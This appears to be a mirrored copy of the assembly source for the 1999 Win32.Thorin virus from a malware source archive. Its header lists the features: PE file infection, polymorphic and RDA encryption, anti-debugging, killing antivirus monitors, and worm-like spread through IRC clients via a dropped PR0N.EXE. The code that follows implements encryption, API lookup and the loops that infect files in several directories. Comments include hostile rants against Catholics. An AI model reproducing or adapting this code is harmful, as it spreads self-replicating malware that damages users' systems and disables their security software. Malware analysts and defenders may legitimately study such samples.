mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 01:15:27 +00:00
7818 lines
238 KiB
NASM
7818 lines
238 KiB
NASM
|
; [Win32.Thorin] - PE/mIRC/PIRCH/ViRC97/resident/semi-stealth/poly/RDA, etc.
|
|||
|
; Copyright (c) 1999 by Billy Belcebu/iKX
|
|||
|
;
|
|||
|
; ??<3F> ??<3F> ??<3F> ???<3F> ??<3F> ??????<3F> ??????<3F>
|
|||
|
; ??? ??? ??? ????<3F> ??? ???????<3F> ???????<3F>
|
|||
|
; ??? ?<3F> ??? ??? ?????<3F> ??? ??????? ???????
|
|||
|
; ??????<3F>??? ??? ??????<3F>??? ??????<3F> ???????
|
|||
|
; ?????????? ??? ??? ?????? ???????? ???????<3F> ??<3F>
|
|||
|
; ???????? ??? ??? ????? ??????? ???????? ???
|
|||
|
; ????????<3F> ??<3F> ??<3F> ??????<3F> ??????<3F> ??<3F> ???<3F> ??<3F>
|
|||
|
; ????????? ??? ??? ????????<3F> ???????<3F> ??? ????<3F> ???
|
|||
|
; ??? ???????? ??? ??? ???????? ??? ?????<3F> ???
|
|||
|
; ??? ???????? ??? ??? ???????<3F> ??? ??????<3F>???
|
|||
|
; ??? ??? ??? ????????? ??? ??? ??? ??? ??????
|
|||
|
; ??? ??? ??? ??????? ??? ??? ??? ??? ?????
|
|||
|
;
|
|||
|
; Virus Name : Thorin.11932 [ Bugfix version ]
|
|||
|
; Virus Author : Billy Belcebu/iKX
|
|||
|
; Origin : Spain
|
|||
|
; Platform : Win32
|
|||
|
; Target : PE files (EXE/SCR/CPL) & mIRC/PIRCH/ViRC97 spreading
|
|||
|
; Poly : THME 1.0 [The Hobbit Mutation Engine]
|
|||
|
; Unpack : LSCE 1.0 [Little Shitty Compression Engine]
|
|||
|
; Compiling : TASM 5.0 and TLINK 5.0 should be used
|
|||
|
; tasm32 /ml /m3 thorin,,;
|
|||
|
; tlink32 /Tpe /aa /c /v thorin,thorin,,import32.lib,
|
|||
|
; pewrsec thorin.exe
|
|||
|
; Why 'Thorin'? : Heh, are you an incult guy? Heh, have you ever read the
|
|||
|
; wonderful book of the wonderful author J. R. R. Tolkien,
|
|||
|
; called "The Hobbit"? Ok, if you did it, you can realize
|
|||
|
; that the most important dwarf is called in this way :) He
|
|||
|
; died with honour, and he couldn't taste the victory and be
|
|||
|
; the king, anyway thanks to him, the Middle-Earth was a much
|
|||
|
; better world for years. Ain't it charming? ;)
|
|||
|
; Features : Ok, here i will list all that this babe is able to do...
|
|||
|
; ? Infect PE files in current, Windows, and System dirs.
|
|||
|
; ? Runtime module, infects 4 files each time.
|
|||
|
; ? Per-Process residency (Import Table & GetProcAddress).
|
|||
|
; ? Infects EXE, SCR & CPL files.
|
|||
|
; ? Anti-Debugging features (SEH & 'IsDebuggerPresent').
|
|||
|
; ? Anti-Emulation features.
|
|||
|
; ? Anti-Monitors, kills AVP Monitor and AMON.
|
|||
|
; ? Polymorphic layer of decryption.
|
|||
|
; ? RDA layer of decryption.
|
|||
|
; ? Size Stealth (FindFirstFileA/FindNextFileA).
|
|||
|
; ? Fast infection (depending of the host).
|
|||
|
; ? Internet aware virus: mIRC, ViRC97 and PIRCH scripts.
|
|||
|
; ? Traversal routine for search for the scripts (hi LJ!).
|
|||
|
; ? Packed dropper, used LSCE 1.0.
|
|||
|
; ? Really tiny unpacker.
|
|||
|
; ? Multiple payloads (see below).
|
|||
|
; ? Doesn't hardcode KERNEL32 base address.
|
|||
|
; ? Doesn't hardcode API addresses (of course).
|
|||
|
; ? Gets Image Base at running time.
|
|||
|
; ? Removes many AV CRC files.
|
|||
|
; ? Avoids infection of certain (dangerous for us) files.
|
|||
|
; Payloads : Yes, this virus has multiple payloads (hi DuST!). Let's see
|
|||
|
; a little overview of them (executed every 26 of October).
|
|||
|
; 1. The biggest one, based in a trick that i learnt from
|
|||
|
; mandragore's viruses, dropping a file as C:\WIN.COM, that
|
|||
|
; gets executed by the system before of the file that should
|
|||
|
; be, that is C:\WINDOWS\WIN.COM, thus bringing us the possi-
|
|||
|
; bility of own the computer before windows :) Well, it cons-
|
|||
|
; ists in a very little, simple and easy quiz that all ppl
|
|||
|
; who had read "The Hobbit" once in his life would be able to
|
|||
|
; pass without problems, and consists of 3 questions.
|
|||
|
; 2. Sets the HD's name as 'THORIN'.
|
|||
|
; 3. Due an idea that my friend Qozah gave me, it swaps the
|
|||
|
; mouse buttons, thus making the user be stoned... All you
|
|||
|
; clicked with the left button, now you'll have to click with
|
|||
|
; the right one, and vice-versa.
|
|||
|
; 4. The typical MessageBox with a silly message.
|
|||
|
; 5. Launches user to Microsoft page, thus annoying him and
|
|||
|
; make his little and ignorant mind to think that the awaited
|
|||
|
; Micro$oft offensive over the earth has began. Well, ain't
|
|||
|
; this one charming? ;)
|
|||
|
; Internet : This virus is able to spread itself using the most used
|
|||
|
; IRC programs over the world: mIRC, PIRCH and ViRC. Every
|
|||
|
; infected system will have a little infected file in
|
|||
|
; C:\PR0N.EXE. This file is sent to everyone that joins the
|
|||
|
; channel where the user is chatting by DCC. Very simple and
|
|||
|
; effective.
|
|||
|
; Greetings : This virus is dedicated to many people... Firstly, to the
|
|||
|
; iKX crew for trust in me, to the DDT past,present and futu-
|
|||
|
; re crew for the friendship during the time, 29A ppl, FS ppl
|
|||
|
; etc. Now, the personal greetings (w/ no particular order):
|
|||
|
;
|
|||
|
; SeptiC - Your 'Internet aware viruses' article rules!!!
|
|||
|
; b0z0 - Hi, my favourite 'little' clown :)
|
|||
|
; StarZer0 - no. no, no. no sex.
|
|||
|
; Int13h - I'd like you come to Spain :)
|
|||
|
; Murkry - I'm glad to be in a group with this genius.
|
|||
|
; n0ph - I still don't have the pleasure of knowin' you...
|
|||
|
; Somniun - Si tienes alguna duda de Win32, pregunta!! ;)
|
|||
|
; Wintermute - RAMMSTEIN rules! You always have reason ;)
|
|||
|
; Owl - You are very isolated from the world, pal :)
|
|||
|
; Vecna - The best coder of everytime.
|
|||
|
; Ypsilon - Nos vemos en septiembre! :)
|
|||
|
; Bumblebee - Pues eso, a ver si tu vienes tambien...
|
|||
|
; TechnoPhunk - Forget catholicism and be nihilist! ;)
|
|||
|
; Qozah - I'd like to do a cooperation project with ya ;)
|
|||
|
; Benny - Same with you :) Yer a reely impressive codah!
|
|||
|
; Super - ?Como te va en Castellon?
|
|||
|
; nIgr0 - Code viruses, not 'legal' thingies!
|
|||
|
; MDriller - best p0lys without any kinda discussion...
|
|||
|
; T-2000 - I share ur ideas 'bout religion: radical but true
|
|||
|
; SlageHammer - I loved yer city! Milano rocks! Padania rocks!
|
|||
|
; VirusBuster - I've seen "Love Struck Baby" video. SRV rlz ;)
|
|||
|
; LordJulus - Keep on coding, but optimize more! ;)
|
|||
|
;
|
|||
|
; Also dedicated to all the Bards around!
|
|||
|
;
|
|||
|
; Thoughts : This is, nowadays, my best virus so far, over Iced Earth,
|
|||
|
; Garaipena, and Nitro, all of them for Windoze. I needed to
|
|||
|
; do at least a good virus, for feed my own ego (why lie?),
|
|||
|
; and i think this is what really happened. But i won't stop
|
|||
|
; there, there are many things yet to explore (and exploit)
|
|||
|
; in 32 bit enviroments, there are many problems unsolved,
|
|||
|
; and i will try to contribute with my humble code for all
|
|||
|
; those purposes. Btw, i used, in my other viruses, to try to
|
|||
|
; optimize , but in this virus i didn't. I mean, you won't
|
|||
|
; see here OBVIOUS lacks of optimization, like CMP reg,-1 but
|
|||
|
; i will use many times the same code in different procedures
|
|||
|
; many strings, two droppers (one for IRC distribution, and
|
|||
|
; other for one payload). This virus is big in its size, well
|
|||
|
; not as Win32.Harrier, Win32.Libertine, WinNT.Remex, etc.,
|
|||
|
; but it's a 'big' one, and i hope this will mean a 'good'
|
|||
|
; one. Fuck, i've coded also a lot of payloads, none of them
|
|||
|
; is destructive, but all are VERY annoying... The descripti-
|
|||
|
; on is above, if you don't believe me.
|
|||
|
; Well, now i'm gonna excuse myself, because while making
|
|||
|
; this virus (based initially on my Win95.Iced Earth) i have
|
|||
|
; noticed the great quantity of bugs that my Iced Earth virus
|
|||
|
; had (believe me, more than 10 incredible bugs!), and i'm
|
|||
|
; still wondering why all those escaped from my beta testing.
|
|||
|
; Moreover, all those bugs only reflect my incompetence. With
|
|||
|
; this virus i have made very serious tests, mainly because
|
|||
|
; some delicated parts of the virus needed it to work perfec-
|
|||
|
; ly (i.e. per-process residence). Maybe there will be also
|
|||
|
; bugs, but now at least i know there are less :)
|
|||
|
; My next steps will be the research in the fields of MMX
|
|||
|
; polymorphism, some metamorphism, and i hope that my next
|
|||
|
; virus will use EPO techniques, because i haven't experimen-
|
|||
|
; ted yet with such a kewl thing.
|
|||
|
; Politics : Benny doesn't like that i use to talk about politics, but i
|
|||
|
; have put it there just for explain some things that could
|
|||
|
; guide you to misunderstand my way of act. Everybody knows
|
|||
|
; that i tend to Marxism, right? Well, but i'm not saying
|
|||
|
; with this that i support Fidel Castro, Mao, and such like
|
|||
|
; pseudo-communists (that tend to totalitarism). I think that
|
|||
|
; everybody must have the same oportunities, and without any
|
|||
|
; kind of discrimination. But as i am not a guy with an only
|
|||
|
; idea, i support also (if there isn't any other choice) the
|
|||
|
; democracy, but i prefer it to be a democracy as participa-
|
|||
|
; tion and not as a procediment. Whom has studied some philo-
|
|||
|
; sophy will know of what i am talking about: avoid the fi-
|
|||
|
; erce and discriminatory capitalism. As i am tolerant, you
|
|||
|
; can be againist my ideas, and i will accept it. So Benny,
|
|||
|
; i'm not a totalitarian asshole, just the opposite, i'm just
|
|||
|
; a young idealist :) Be free, enjoy life...
|
|||
|
; Final note : Although it screwed me a lot, i haven't put data in the
|
|||
|
; heap as i used to do because this virus is too big and the
|
|||
|
; data used temporally is also too big, and it generated some
|
|||
|
; protection faults... SHIT!!!!
|
|||
|
;
|
|||
|
; That is not dead
|
|||
|
; which can eternal lie
|
|||
|
; yet with strange aeons
|
|||
|
; even death may die
|
|||
|
;
|
|||
|
; -H. P. Lovecraft-
|
|||
|
;
|
|||
|
; (c) 1999 Billy Belcebu/iKX
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat
|
|||
|
.data
|
|||
|
|
|||
|
; 1st gen exported apis
|
|||
|
|
|||
|
extrn MessageBoxA:PROC
|
|||
|
extrn ExitProcess:PROC
|
|||
|
|
|||
|
; Some useful equates
|
|||
|
|
|||
|
virus_size equ (offset virus_end-offset virus_start)
|
|||
|
poly_virus_size equ (offset crypt_end-offset thorin)
|
|||
|
shit_b4_delta equ (offset delta-offset virus_start)
|
|||
|
encrypt_size equ (crypt_end-crypto)
|
|||
|
non_crypt_size equ (virus_size-encrypt_size-rda_decryptor)
|
|||
|
rda_decryptor equ (virus_end-crypt_end)
|
|||
|
section_flags equ 00000020h or 20000000h or 80000000h
|
|||
|
directory_attr equ 00000010h
|
|||
|
temp_attributes equ 00000080h
|
|||
|
drop_old_size equ 00011000d
|
|||
|
n_Handles equ 50d
|
|||
|
WFD_HndSize equ n_Handles*8
|
|||
|
|
|||
|
n_infections equ 04h
|
|||
|
bad_number equ 09h
|
|||
|
|
|||
|
orig_size equ 044h
|
|||
|
mark equ 04Ch
|
|||
|
ddInfMark equ "NRHT"
|
|||
|
|
|||
|
kernel_ equ 0BFF70000h ; Only used if the K32 search
|
|||
|
kernel_wNT equ 077F00000h ; fails...
|
|||
|
|
|||
|
imagebase_ equ 000400000h ; y0h0h0
|
|||
|
|
|||
|
; Interesting macros for my code
|
|||
|
|
|||
|
cmp_ macro reg,joff1 ; Optimized version of
|
|||
|
inc reg ; CMP reg,0FFFFFFFFh
|
|||
|
jz joff1 ; JZ joff1
|
|||
|
dec reg ; The code is reduced in 3
|
|||
|
endm ; bytes (7-4)
|
|||
|
|
|||
|
cmpz macro reg,joff2 ; Optimized version of
|
|||
|
xchg reg,ecx ; CMP reg,00h
|
|||
|
jecxz joff2 ; JZ joff2
|
|||
|
endm ; Code reduced in 2 bytes
|
|||
|
|
|||
|
cmpz_ macro reg,joff3 ; Blah
|
|||
|
or reg,reg
|
|||
|
jz joff3
|
|||
|
endm
|
|||
|
|
|||
|
apicall macro apioff ; Optimize muthafucka!
|
|||
|
call dword ptr [ebp+apioff]
|
|||
|
endm
|
|||
|
|
|||
|
rva2va macro reg,base ; Only for make preetiest the
|
|||
|
add reg,[ebp+base] ; code ;)
|
|||
|
endm
|
|||
|
|
|||
|
virussize macro
|
|||
|
db virus_size/10000 mod 10 + "0"
|
|||
|
db virus_size/01000 mod 10 + "0"
|
|||
|
db virus_size/00100 mod 10 + "0"
|
|||
|
db virus_size/00010 mod 10 + "0"
|
|||
|
db virus_size/00001 mod 10 + "0"
|
|||
|
endm
|
|||
|
|
|||
|
; Some shitty thingies in data section... 1st gen host messages
|
|||
|
|
|||
|
.data
|
|||
|
|
|||
|
szTitle db "[Win32.Thorin]",0
|
|||
|
szMessage db "First Generation Sample",10
|
|||
|
db "Virus Size : "
|
|||
|
virussize
|
|||
|
db " bytes"
|
|||
|
db 10
|
|||
|
db "Copyright (c) 1999 by Billy Belcebu/iKX",0
|
|||
|
|
|||
|
; El ke mucho llora es porke no mama!
|
|||
|
|
|||
|
.code
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Virus code
|
|||
|
; ===========================================================================
|
|||
|
; DU HAST MICH!!!
|
|||
|
|
|||
|
virus_start label byte
|
|||
|
|
|||
|
poly_layer db LIMIT dup (90h) ; Space for poly-decryptor
|
|||
|
|
|||
|
thorin:
|
|||
|
pushad ; Push all da shit
|
|||
|
pushfd
|
|||
|
|
|||
|
fwait ; Reset coprocessor
|
|||
|
fninit
|
|||
|
|
|||
|
call kill_av ; Anti-emulation trick
|
|||
|
|
|||
|
mov esp,[esp+08h]
|
|||
|
xor edx,edx
|
|||
|
pop dword ptr fs:[edx]
|
|||
|
pop edx
|
|||
|
jmp over_trap
|
|||
|
|
|||
|
kill_av:
|
|||
|
xor edx,edx
|
|||
|
push dword ptr fs:[edx]
|
|||
|
mov fs:[edx],esp
|
|||
|
dec byte ptr [edx]
|
|||
|
jmp over_rda
|
|||
|
|
|||
|
over_trap:
|
|||
|
call delta ; Hardest code to undestand ;)
|
|||
|
delta: pop ebp
|
|||
|
mov eax,ebp
|
|||
|
sub ebp,offset delta
|
|||
|
|
|||
|
sub eax,shit_b4_delta
|
|||
|
sub eax,00001000h
|
|||
|
NewEIP equ $-4
|
|||
|
|
|||
|
push eax ; Save it
|
|||
|
or ebp,ebp ; Goddamn first gen...
|
|||
|
jz over_rda
|
|||
|
call rda_crypt
|
|||
|
jmp over_rda
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; RDA Layer (Random Decryption Algorithm)
|
|||
|
; ===========================================================================
|
|||
|
; I have become a direct. I have become insurgent.
|
|||
|
|
|||
|
rda_crypt proc
|
|||
|
xor ebx,ebx ; Clear counter
|
|||
|
try_another_key:
|
|||
|
call crypt ; Try to decrypt it
|
|||
|
push ebx ; Save counter
|
|||
|
lea esi,[ebp+crypto] ; Load address to crypt
|
|||
|
mov edi,encrypt_size ; Size to crypt
|
|||
|
call CRC32 ; Get its CRC32
|
|||
|
pop ebx ; Restore counter
|
|||
|
cmp eax,12345678h ; Actual CRC32=CRC32 unencrypted?
|
|||
|
CRC equ $-4
|
|||
|
jz rda_done ; Yeah, then we decrypted it
|
|||
|
call crypt ; Nopes, fix it
|
|||
|
inc ebx ; increase key
|
|||
|
jmp try_another_key ; Try with another key
|
|||
|
rda_done:
|
|||
|
ret
|
|||
|
rda_crypt endp
|
|||
|
|
|||
|
crypt proc ; This procedures simplifies
|
|||
|
lea edi,[ebp+crypto] ; the task (and optimizes) of
|
|||
|
mov ecx,encrypt_size ; encrypt with a determinated
|
|||
|
rda_: xor byte ptr [edi],bl ; key
|
|||
|
inc edi
|
|||
|
loop rda_
|
|||
|
ret
|
|||
|
crypt endp
|
|||
|
|
|||
|
; Legalizar consimizion, no te konviene... se akaba el filon!
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; CRC32 calculator [by Vecna]
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Offset where code to calculate begins
|
|||
|
; EDI = Size of that code
|
|||
|
; output:
|
|||
|
; EAX = CRC32 of given code
|
|||
|
;
|
|||
|
|
|||
|
CRC32 proc
|
|||
|
cld
|
|||
|
push ebx
|
|||
|
xor ecx,ecx ; Optimized by me - 2 bytes
|
|||
|
dec ecx ; less
|
|||
|
mov edx,ecx
|
|||
|
NextByteCRC:
|
|||
|
xor eax,eax
|
|||
|
xor ebx,ebx
|
|||
|
lodsb
|
|||
|
xor al,cl
|
|||
|
mov cl,ch
|
|||
|
mov ch,dl
|
|||
|
mov dl,dh
|
|||
|
mov dh,8
|
|||
|
NextBitCRC:
|
|||
|
shr bx,1
|
|||
|
rcr ax,1
|
|||
|
jnc NoCRC
|
|||
|
xor ax,08320h
|
|||
|
xor bx,0EDB8h
|
|||
|
NoCRC: dec dh
|
|||
|
jnz NextBitCRC
|
|||
|
xor ecx,eax
|
|||
|
xor edx,ebx
|
|||
|
dec edi ; Another fool byte less
|
|||
|
jnz NextByteCRC
|
|||
|
not edx
|
|||
|
not ecx
|
|||
|
pop ebx
|
|||
|
mov eax,edx
|
|||
|
rol eax,16
|
|||
|
mov ax,cx
|
|||
|
ret
|
|||
|
CRC32 endp
|
|||
|
|
|||
|
crypto equ $
|
|||
|
|
|||
|
db " [IAIDA] " ; Little message to the pree-
|
|||
|
; tiest girl over the earth.
|
|||
|
; She deserves much more, i
|
|||
|
; know... anyway... she's here!
|
|||
|
|
|||
|
; No penseis ke soy baboso, ein?!?!?!?!?!? :)
|
|||
|
|
|||
|
over_rda:
|
|||
|
pop eax
|
|||
|
mov dword ptr [ebp+ModBase],eax ; EAX = Image Base of module
|
|||
|
|
|||
|
|
|||
|
call ChangeSEH ; SEH rlz.
|
|||
|
mov esp,[esp+08h] ; Restore stack
|
|||
|
jmp RestoreSEH
|
|||
|
ChangeSEH:
|
|||
|
xor ebx,ebx ; Joder, no joderemos...
|
|||
|
push dword ptr fs:[ebx] ; pero <20>JODER! las ganas ke
|
|||
|
mov fs:[ebx],esp ; tenemos :)
|
|||
|
|
|||
|
and byte ptr [ebp+inNT],00h ; Make zero inNT variable
|
|||
|
|
|||
|
mov ecx,cs ; Check if we are under WinNT
|
|||
|
xor cl,cl
|
|||
|
jecxz WinNT ; ECX = 0 - WinNT;100 - Win9X
|
|||
|
jmp shock
|
|||
|
|
|||
|
WinNT:
|
|||
|
inc byte ptr [ebp+inNT] ; If NT, mark this
|
|||
|
shock:
|
|||
|
mov esi,[esp+2Ch] ; Get program return address
|
|||
|
mov ecx,05d ; Max level
|
|||
|
call GetK32
|
|||
|
|
|||
|
; I hate the catholicism... I HATE THE CATHOLICISM!!!! STOP HIPOCRISY!!!!!!!!
|
|||
|
; STOP THOSE GODDAMN LIES!!! What is that? God helps us? Hahahahah!!! So, you
|
|||
|
; stupid catholic asshole... why there are wars, genocides, etc? Why we, the
|
|||
|
; human race, are as cruel with other humans, the nature, and everything that
|
|||
|
; goes againist our own process to earn money? Open your eyes... i won't make
|
|||
|
; you change using the power... just change yourself... it's your choice.
|
|||
|
|
|||
|
asakopako:
|
|||
|
mov dword ptr [ebp+kernel],eax ; EAX must be K32 base address
|
|||
|
|
|||
|
; This is the main branch of the virus
|
|||
|
|
|||
|
lea edi,[ebp+@@Offsetz]
|
|||
|
lea esi,[ebp+@@Namez]
|
|||
|
call GetAPIs ; Retrieve all APIs
|
|||
|
|
|||
|
call AntiDebugger ; Antidebug their arse
|
|||
|
|
|||
|
call PrepareInfection ; Set-up infection
|
|||
|
|
|||
|
call KillMonitors ; Kill AV monitors
|
|||
|
|
|||
|
call InfectItAll ; Infect dirs
|
|||
|
|
|||
|
call DropPR0N ; Unpack and drop PR0N.EXE
|
|||
|
|
|||
|
call TraversalSearch ; Search for scripts and dr0p
|
|||
|
|
|||
|
call HookAllAPIs ; Hook IT APIs
|
|||
|
|
|||
|
; Ok, we prepare to end the adventure...
|
|||
|
|
|||
|
push WFD_HndSize ; Hook some mem for WFD_Handles
|
|||
|
push 00000000h ; structure
|
|||
|
apicall _GlobalAlloc
|
|||
|
mov dword ptr [ebp+WFD_HndInMem],eax
|
|||
|
|
|||
|
; Activate payload every 26th of October, a magical day.
|
|||
|
|
|||
|
lea eax,[ebp+SYSTEMTIME]
|
|||
|
push eax
|
|||
|
apicall _GetSystemTime
|
|||
|
|
|||
|
cmp word ptr [ebp+ST_wDay],31d
|
|||
|
jnz continue_payload
|
|||
|
jmp delete_key
|
|||
|
|
|||
|
continue_payload:
|
|||
|
cmp word ptr [ebp+ST_wDay],26d
|
|||
|
jnz no_payload
|
|||
|
|
|||
|
cmp word ptr [ebp+ST_wMonth],10d
|
|||
|
jnz no_payload
|
|||
|
|
|||
|
call payload ; Well... payloads :)
|
|||
|
|
|||
|
no_payload:
|
|||
|
xchg ebp,ecx ; 1st gen shit
|
|||
|
jecxz fakehost_
|
|||
|
|
|||
|
RestoreSEH:
|
|||
|
xor ebx,ebx ; Restore old SEH handler
|
|||
|
pop dword ptr fs:[ebx]
|
|||
|
pop eax
|
|||
|
|
|||
|
popfd ; Restore registers & flags
|
|||
|
popad
|
|||
|
|
|||
|
mov ebx,12345678h ; Here goes program's EIP
|
|||
|
org $-4
|
|||
|
OldEIP dd 00001000h
|
|||
|
|
|||
|
add ebx,12345678h ; And here its base address
|
|||
|
org $-4
|
|||
|
ModBase dd imagebase_
|
|||
|
|
|||
|
push ebx ; We return control to host
|
|||
|
ret
|
|||
|
|
|||
|
fakehost_:
|
|||
|
jmp fakehost ; 1st gen shitz0r
|
|||
|
|
|||
|
; CATHOLICISM = FASCISM = SHIT
|
|||
|
|
|||
|
delete_key: ; This gets executed once
|
|||
|
lea esi,[ebp+key_mIRC] ; each 2 months :)
|
|||
|
call DelReg
|
|||
|
lea esi,[ebp+key_PIRCH]
|
|||
|
call DelReg
|
|||
|
lea esi,[ebp+key_ViRC97]
|
|||
|
call DelReg
|
|||
|
jmp no_payload
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Most important virus info :)
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
vname label byte
|
|||
|
db "[Win32.Thorin."
|
|||
|
virussize
|
|||
|
db " v1.00]",00h
|
|||
|
copyr db "Copyright (c) 1999 by Billy Belcebu/iKX",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Obtain useful info that will be used in infection process
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
PrepareInfection:
|
|||
|
lea edi,[ebp+WindowsDir] ; Pointer to the variable
|
|||
|
push 7Fh ; Size of dir variable
|
|||
|
push edi ; Push it!
|
|||
|
apicall _GetWindowsDirectoryA
|
|||
|
|
|||
|
add edi,7Fh ; Pointer to the variable
|
|||
|
push 7Fh ; Size of dir variable
|
|||
|
push edi ; Push it!
|
|||
|
apicall _GetSystemDirectoryA
|
|||
|
|
|||
|
add edi,7Fh ; Pointer to the variable
|
|||
|
push edi ; Size of dir variable
|
|||
|
push 7Fh ; Push it!
|
|||
|
apicall _GetCurrentDirectoryA
|
|||
|
|
|||
|
lea eax,[ebp+szUSER32] ; Get all needed APIs from
|
|||
|
push eax ; the USER32.DLL library
|
|||
|
apicall _LoadLibraryA
|
|||
|
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
lea edi,[ebp+@@USER32_APIs] ; Pointer to API strings
|
|||
|
lea esi,[ebp+@@USER32_Addresses] ; Pointer to API addresses
|
|||
|
retrieve_user32_apis:
|
|||
|
push edi ; Push pointer to string
|
|||
|
push ebx ; Push USER32 base address
|
|||
|
apicall _GetProcAddress
|
|||
|
|
|||
|
xchg edi,esi ; Store the address
|
|||
|
stosd
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
xor al,al ; Get the end of string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
|
|||
|
cmp byte ptr [edi],"" ; I like girls...
|
|||
|
jz all_user32_apis ; Is last api?
|
|||
|
jmp retrieve_user32_apis
|
|||
|
|
|||
|
all_user32_apis:
|
|||
|
lea eax,[ebp+szADVAPI32] ; Here we will get all needed
|
|||
|
push eax ; APIs from ADVAPI32.DLL
|
|||
|
apicall _LoadLibraryA
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
lea edi,[ebp+@@ADVAPI32_APIs] ; Pointer to API names
|
|||
|
lea esi,[ebp+@@ADVAPI32_Addresses] ; Pointer to API addresses
|
|||
|
retrieve_advapi32_apis:
|
|||
|
push edi ; Push pointer to name
|
|||
|
push ebx ; Push ADVAPI32 base address
|
|||
|
apicall _GetProcAddress
|
|||
|
|
|||
|
xchg edi,esi ; Store API address
|
|||
|
stosd
|
|||
|
xchg edi,esi
|
|||
|
|
|||
|
xor al,al ; Get the end of API string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
|
|||
|
cmp byte ptr [edi],"" ; I like music [:)~
|
|||
|
jz all_advapi32_apis
|
|||
|
jmp retrieve_advapi32_apis
|
|||
|
|
|||
|
all_advapi32_apis:
|
|||
|
ret
|
|||
|
|
|||
|
; Heh, a greeting to the man (and the book!) that inspired this virus :)
|
|||
|
|
|||
|
db 0,"[The Hobbit (c) 1937 by J.R.R. Tolkien]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Infect current, Windows and System directories
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
InfectItAll:
|
|||
|
lea edi,[ebp+directories] ; Pointer to 1st directory
|
|||
|
mov byte ptr [ebp+mirrormirror],dirs2inf ; Set up variable
|
|||
|
requiem:
|
|||
|
push edi ; Set as current dir the
|
|||
|
apicall _SetCurrentDirectoryA ; dir to infect
|
|||
|
|
|||
|
call DeleteShit ; Delete AV CRC files
|
|||
|
|
|||
|
push edi
|
|||
|
|
|||
|
; Initialize this values for each directory processed
|
|||
|
|
|||
|
and byte ptr [ebp+CurrentExt],00h
|
|||
|
lea esi,[ebp+EXTENSIONS]
|
|||
|
lea edi,[ebp+EXTENSION]
|
|||
|
|
|||
|
infect_all_masks:
|
|||
|
cmp byte ptr [ebp+CurrentExt],n_EXT
|
|||
|
jae all_mask_infected
|
|||
|
|
|||
|
lodsd ; EAX = EXTENSION
|
|||
|
mov [edi],eax ; No STOSD! We don't want EDI
|
|||
|
; to change...
|
|||
|
|
|||
|
push edi esi
|
|||
|
call Infect ; Infect some files
|
|||
|
pop esi edi
|
|||
|
|
|||
|
inc byte ptr [ebp+CurrentExt]
|
|||
|
jmp infect_all_masks
|
|||
|
all_mask_infected:
|
|||
|
pop edi
|
|||
|
|
|||
|
add edi,7Fh ; Get another directory
|
|||
|
|
|||
|
dec byte ptr [ebp+mirrormirror] ; Check if we infected all
|
|||
|
cmp byte ptr [ebp+mirrormirror],00h ; available directories
|
|||
|
jnz requiem
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Search MASK and infect found uninfected files
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
Infect: and dword ptr [ebp+infections],00000000h ; reset countah
|
|||
|
lea eax,[ebp+offset WIN32_FIND_DATA] ; Find's shit
|
|||
|
push eax
|
|||
|
|
|||
|
lea eax,[ebp+offset _MASK]
|
|||
|
push eax
|
|||
|
|
|||
|
apicall _FindFirstFileA ; Get first file on directory
|
|||
|
cmp_ eax,FailInfect ; Failed? Shit...
|
|||
|
mov dword ptr [ebp+SearchHandle],eax
|
|||
|
|
|||
|
__1: lea edi,[ebp+WFD_szFileName]
|
|||
|
call AvoidShitFiles
|
|||
|
jc __2
|
|||
|
|
|||
|
push dword ptr [ebp+NewEIP]
|
|||
|
push dword ptr [ebp+OldEIP]
|
|||
|
push dword ptr [ebp+ModBase]
|
|||
|
call Infection ; Infect file
|
|||
|
pop dword ptr [ebp+ModBase]
|
|||
|
pop dword ptr [ebp+OldEIP]
|
|||
|
pop dword ptr [ebp+NewEIP]
|
|||
|
jc __2
|
|||
|
|
|||
|
inc byte ptr [ebp+infections]
|
|||
|
cmp byte ptr [ebp+infections],n_infections ; Did we infected them?
|
|||
|
jae FailInfect ; Yeah... :)
|
|||
|
|
|||
|
__2: lea edi,[ebp+WFD_szFileName] ; Clear name field
|
|||
|
mov ecx,MAX_PATH
|
|||
|
xor al,al
|
|||
|
rep stosb
|
|||
|
|
|||
|
lea eax,[ebp+offset WIN32_FIND_DATA] ; Search for another file
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+SearchHandle]
|
|||
|
apicall _FindNextFileA
|
|||
|
cmpz eax,CloseSearchHandle
|
|||
|
jmp __1
|
|||
|
|
|||
|
CloseSearchHandle:
|
|||
|
push dword ptr [ebp+SearchHandle] ; Close search handle
|
|||
|
apicall _FindClose
|
|||
|
FailInfect:
|
|||
|
ret
|
|||
|
|
|||
|
db 0,"[Luthien is still alive in the world]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Traversal search for mIRC and PIRCH scripts (modified version of LJ's code)
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
TraversalSearch:
|
|||
|
lea esi,[ebp+tempcurdir] ; Get the current directory
|
|||
|
push esi ; (We only want the current
|
|||
|
push 7Fh ; drive)
|
|||
|
apicall _GetCurrentDirectoryA
|
|||
|
|
|||
|
lodsb ; Get drive
|
|||
|
|
|||
|
mov byte ptr [ebp+root],al ; Put it in its variable
|
|||
|
|
|||
|
lea eax,[ebp+root] ; Reach the root directory
|
|||
|
push eax ; of the current drive
|
|||
|
apicall _SetCurrentDirectoryA
|
|||
|
|
|||
|
Traversal:
|
|||
|
lea esi,[ebp+key_mIRC] ; Already catched? Avoid
|
|||
|
call RegExist ; this if so, as it needs many
|
|||
|
